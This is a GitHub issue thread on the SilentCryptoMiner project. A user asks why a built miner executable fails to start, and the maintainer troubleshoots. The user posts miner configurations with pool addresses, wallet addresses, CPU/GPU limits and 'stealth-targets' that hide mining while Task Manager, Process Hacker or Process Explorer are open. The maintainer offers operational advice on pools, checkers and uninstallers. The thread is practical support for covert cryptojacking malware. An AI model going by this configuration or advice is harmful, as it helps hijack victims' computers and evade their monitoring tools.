### ISSUE TITLE
final .exe is not running

### ISSUE THREAD

**Issue by RiseMe-origami** [UnamSanctam/SilentCryptoMiner#471]
Hi,
I just built a final .exe and it does not run.
It worked before, I just added the api point, could it be caused by that?¨

Also when I access the /api/enpoint.php it says "Error: Invalid data" - is that ok?

Best,
..

**Comment by UnamSanctam** [comment]
If you disable the "API Endpoint URL" does it work for you again? And yes it should say "Error: Invalid data".

**Comment by RiseMe-origami** [comment]
does not start up either without the  "API Endpoint URL" turne doff

**Comment by RiseMe-origami** [comment]
{
    "algo": "rx/0",
    "pool": "pool.minexmr.com",
    "port": 4444,
    "wallet": "4AFJHLkq9j4VLGx4jN31BH5cb6PZU111hEeCHqdEJQ3Ug5qUvtGUbCobbWZXZE7eryL9Tv9koPR2RK42XYHPLn64GE1reNk",
    "password": "",
    "nicehash": false,
    "ssltls": false,
    "max-cpu": 50,
    "idle-wait": 5,
    "idle-cpu": 100,
    "stealth-targets": "",
    "kill-targets": ""
}

{
    "url": "stratum://`0xbc814ffEa5f72fB3E7D4d8E27ec28bae12095529`@eu1.ethermine.org:4444",
    "algo": "ethash",
    "max-gpu": 70,
    "idle-wait": 5,
    "idle-gpu": 100,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": ""
}



here are my settings,just in case

**Comment by UnamSanctam** [comment]
You shouldn't use MineXMR, try another pool. But are no miners running inside the checker (run the checker that gets generated with your miner)?

**Comment by RiseMe-origami** [comment]
Yup, I chcecked and there is not even the ethash

**Comment by RiseMe-origami** [comment]
Does not show up with the example settings either

**Comment by UnamSanctam** [comment]
Run all the uninstallers you have before if you haven't already, it should work with the example settings unless it's something with the computer.

**Comment by RiseMe-origami** [comment]
Aight, thank you very much, Ill try everything and update if I manage to fix it.

Have a beautiful day!
